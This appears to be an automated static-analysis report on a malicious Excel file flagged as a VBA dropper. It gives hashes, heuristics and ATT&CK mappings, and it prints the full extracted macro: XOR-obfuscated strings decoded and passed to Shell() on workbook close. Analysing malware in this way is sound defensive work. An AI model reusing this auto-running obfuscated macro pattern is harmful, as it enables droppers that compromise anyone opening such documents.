Xls.Dropper.Agent-7401228-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 25ed1b11010361b5…

MALICIOUS

Office (OLE)

40.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: a99745baf2b193b2be6db0628b77b518 SHA-1: 31d95dfe4aab93fac5164a85143d1801276dbeb8 SHA-256: 25ed1b11010361b5c6b198f72b88bcf293418552f976cd1c040e51cea61905b1
140 Risk Score

Malware Insights

Xls.Dropper.Agent-7401228-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristic OLE_VBA_SHELL indicates that the VBA macros within this Excel file attempt to execute a command. The script reconstructs the string 'calc' and executes it using the Shell() function, likely to download and run a second-stage payload. The ClamAV detection further confirms its malicious nature as a dropper.

Heuristics 3

  • ClamAV: Xls.Dropper.Agent-7401228-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7401228-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2054 bytes
SHA-256: ba189e7eb90f83d0ef92e2383580b33322a3d8c72f9e3d0ac283a539e2fe77b7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub maybe()
heart

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
maybe



Var = "calc"
Shell (Var)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
Sub heart()
LL1 = fMf5j80uf("   B v ;F PX  x", "qjw6eVxO2")

LL2 = fMf5j80uf("; c", "VeLqiZ8wF")

LL3 = fMf5j80uf(" $   ", "iWnqclUVA")

LL4 = fMf5j80uf("  >#U1 6   %?U, ", "rvDZ9DkWo")

LL5 = fMf5j80uf("& Y ! >", "Kz6eOwMRf")

LL = LL1 + LL2 + LL3 + LL4 + LL5

Shell (LL)

End Sub
Public Function YDyzxCnuBRs()
Dim sRuZQEtNEvISCBp As Integer
sRuZQEtNEvISCBp = "4470"

End Function
Public Function lNhMkCOCAuMJgPbgdoFG()
Dim sRuZQEtNEvISCBp As Integer
sRuZQEtNEvISCBp = "4470"
Dim rUkQQqyoTOPNSDwDi As Long
rUkQQqyoTOPNSDwDi = "8898"

End Function


Public Function fMf5j80uf(ByVal tYKgX4jdl As String, ByVal I50RspIZC As String) As String

Dim a2xCMwg4M As Long

    For a2xCMwg4M = 1 To Len(tYKgX4jdl)

        fMf5j80uf = fMf5j80uf & Chr(Asc(Mid(I50RspIZC, IIf(a2xCMwg4M Mod Len(I50RspIZC) <> 0, a2xCMwg4M Mod Len(I50RspIZC), Len(I50RspIZC)), 1)) Xor Asc(Mid(tYKgX4jdl, a2xCMwg4M, 1)))

    Next a2xCMwg4M

End Function
Private Function phGjNytiCtkx()
Dim PrNaoVnZdD As Integer
PrNaoVnZdD = "7985"

End Function
Private Function ByUrPURdgvQblgJZsLfaOuDECHslsQ()
Dim PrNaoVnZdD As Integer
PrNaoVnZdD = "7985"
If "FxQmeOwySvAOZtGu" = "HedEmDquTuFROlHgYTgwLhUeBw" Then End

End Function